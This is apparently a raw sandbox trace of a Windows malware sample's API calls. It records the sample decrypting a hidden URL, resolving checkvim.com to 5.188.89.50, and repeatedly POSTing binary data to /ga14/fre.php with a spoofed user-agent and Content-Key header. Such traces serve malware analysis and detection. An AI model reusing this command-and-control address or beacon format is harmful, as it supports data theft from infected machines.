[0286.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.552] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.553] GetProcessHeap () returned 0x840000 [0286.553] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0286.553] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0286.553] GetProcessHeap () returned 0x840000 [0286.553] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0286.553] GetProcessHeap () returned 0x840000 [0286.553] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0286.553] GetProcessHeap () returned 0x840000 [0286.553] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0286.553] GetProcessHeap () returned 0x840000 [0286.553] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7e8 [0286.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.555] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0286.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.561] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0286.568] GetProcessHeap () returned 0x840000 [0286.568] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0286.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.570] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0286.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.571] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0286.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.572] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.572] GetProcessHeap () returned 0x840000 [0286.572] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0286.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.573] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7e8, pdwDataLen=0x19f9a4 | out: pbData=0x87f7e8, pdwDataLen=0x19f9a4) returned 1 [0286.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.574] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0286.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0286.575] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0286.576] GetProcessHeap () returned 0x840000 [0286.576] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0286.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.577] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0286.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.578] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0286.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0286.579] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0286.579] GetProcessHeap () returned 0x840000 [0286.579] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713d0 [0286.579] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0286.582] GetProcessHeap () returned 0x840000 [0286.582] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0286.582] socket (af=2, type=1, protocol=6) returned 0x470 [0286.582] connect (s=0x470, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0286.654] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0286.654] GetProcessHeap () returned 0x840000 [0286.654] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fac8 [0286.654] GetProcessHeap () returned 0x840000 [0286.654] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0286.655] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0286.656] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0286.656] GetProcessHeap () returned 0x840000 [0286.656] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0286.656] GetProcessHeap () returned 0x840000 [0286.656] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0286.656] GetProcessHeap () returned 0x840000 [0286.656] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0286.656] GetProcessHeap () returned 0x840000 [0286.656] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0286.657] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0286.657] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0286.657] GetProcessHeap () returned 0x840000 [0286.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0286.658] GetProcessHeap () returned 0x840000 [0286.658] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0286.658] send (s=0x470, buf=0x873a58*, len=237, flags=0) returned 237 [0286.658] send (s=0x470, buf=0x87eb58*, len=159, flags=0) returned 159 [0286.658] GetProcessHeap () returned 0x840000 [0286.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0286.658] recv (in: s=0x470, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0287.007] GetProcessHeap () returned 0x840000 [0287.007] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0287.007] GetProcessHeap () returned 0x840000 [0287.007] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0287.007] GetProcessHeap () returned 0x840000 [0287.007] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0287.008] GetProcessHeap () returned 0x840000 [0287.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fac8 | out: hHeap=0x840000) returned 1 [0287.008] closesocket (s=0x470) returned 0 [0287.008] GetProcessHeap () returned 0x840000 [0287.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0287.008] GetProcessHeap () returned 0x840000 [0287.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0287.008] GetProcessHeap () returned 0x840000 [0287.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0287.008] GetProcessHeap () returned 0x840000 [0287.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713d0 | out: hHeap=0x840000) returned 1 [0287.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x784) returned 0x470 [0287.016] Sleep (dwMilliseconds=0xea60) [0287.017] GetProcessHeap () returned 0x840000 [0287.017] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f908 [0287.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.018] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0287.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.029] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0287.036] GetProcessHeap () returned 0x840000 [0287.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0287.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.037] CryptImportKey (in: hProv=0x86fdf8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0287.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.038] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0287.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.045] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.045] GetProcessHeap () returned 0x840000 [0287.045] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0287.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.046] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f908, pdwDataLen=0x19f9a4 | out: pbData=0x87f908, pdwDataLen=0x19f9a4) returned 1 [0287.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.047] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0287.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.048] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0287.048] GetProcessHeap () returned 0x840000 [0287.048] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0287.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.049] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.050] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.051] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.051] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.051] GetProcessHeap () returned 0x840000 [0287.052] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0287.052] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0287.052] GetProcessHeap () returned 0x840000 [0287.052] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0287.052] GetProcessHeap () returned 0x840000 [0287.052] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0287.052] GetProcessHeap () returned 0x840000 [0287.052] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0287.052] GetProcessHeap () returned 0x840000 [0287.052] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7e8 [0287.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.053] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0287.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.058] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0287.063] GetProcessHeap () returned 0x840000 [0287.063] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0287.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.064] CryptImportKey (in: hProv=0x86f798, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0287.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.065] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0287.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.066] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.066] GetProcessHeap () returned 0x840000 [0287.066] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0287.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.067] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7e8, pdwDataLen=0x19f9a4 | out: pbData=0x87f7e8, pdwDataLen=0x19f9a4) returned 1 [0287.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.068] CryptDestroyKey (hKey=0x87e730) returned 1 [0287.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.069] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0287.069] GetProcessHeap () returned 0x840000 [0287.069] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0287.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.069] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0287.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.070] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0287.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.071] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0287.071] GetProcessHeap () returned 0x840000 [0287.071] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0287.071] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0287.073] GetProcessHeap () returned 0x840000 [0287.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c38 [0287.073] socket (af=2, type=1, protocol=6) returned 0x474 [0287.073] connect (s=0x474, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0287.147] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0287.150] GetProcessHeap () returned 0x840000 [0287.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0287.150] GetProcessHeap () returned 0x840000 [0287.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0287.151] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0287.152] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0287.152] GetProcessHeap () returned 0x840000 [0287.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0287.152] GetProcessHeap () returned 0x840000 [0287.152] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0287.152] GetProcessHeap () returned 0x840000 [0287.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0287.152] GetProcessHeap () returned 0x840000 [0287.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0287.153] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0287.153] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0287.154] GetProcessHeap () returned 0x840000 [0287.154] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0287.154] GetProcessHeap () returned 0x840000 [0287.154] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0287.154] send (s=0x474, buf=0x873a58*, len=237, flags=0) returned 237 [0287.154] send (s=0x474, buf=0x87eb58*, len=159, flags=0) returned 159 [0287.154] GetProcessHeap () returned 0x840000 [0287.154] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0287.154] recv (in: s=0x474, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0287.538] GetProcessHeap () returned 0x840000 [0287.538] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0287.538] GetProcessHeap () returned 0x840000 [0287.538] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0287.538] GetProcessHeap () returned 0x840000 [0287.538] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0287.538] GetProcessHeap () returned 0x840000 [0287.538] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0287.538] closesocket (s=0x474) returned 0 [0287.539] GetProcessHeap () returned 0x840000 [0287.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c38 | out: hHeap=0x840000) returned 1 [0287.539] GetProcessHeap () returned 0x840000 [0287.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0287.539] GetProcessHeap () returned 0x840000 [0287.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0287.539] GetProcessHeap () returned 0x840000 [0287.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0287.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xe74) returned 0x474 [0287.541] Sleep (dwMilliseconds=0xea60) [0287.542] GetProcessHeap () returned 0x840000 [0287.542] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0287.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.543] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0287.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.549] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fd70) returned 1 [0287.571] GetProcessHeap () returned 0x840000 [0287.571] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0287.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.572] CryptImportKey (in: hProv=0x86fd70, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0287.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.573] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0287.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.574] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.574] GetProcessHeap () returned 0x840000 [0287.574] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0287.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.575] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0287.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.576] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0287.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.576] CryptReleaseContext (hProv=0x86fd70, dwFlags=0x0) returned 1 [0287.577] GetProcessHeap () returned 0x840000 [0287.577] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0287.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.577] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.578] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.579] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0287.580] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.580] GetProcessHeap () returned 0x840000 [0287.580] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0287.580] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0287.580] GetProcessHeap () returned 0x840000 [0287.580] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0287.580] GetProcessHeap () returned 0x840000 [0287.580] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0287.580] GetProcessHeap () returned 0x840000 [0287.580] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0287.580] GetProcessHeap () returned 0x840000 [0287.580] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0287.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0287.581] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0287.586] 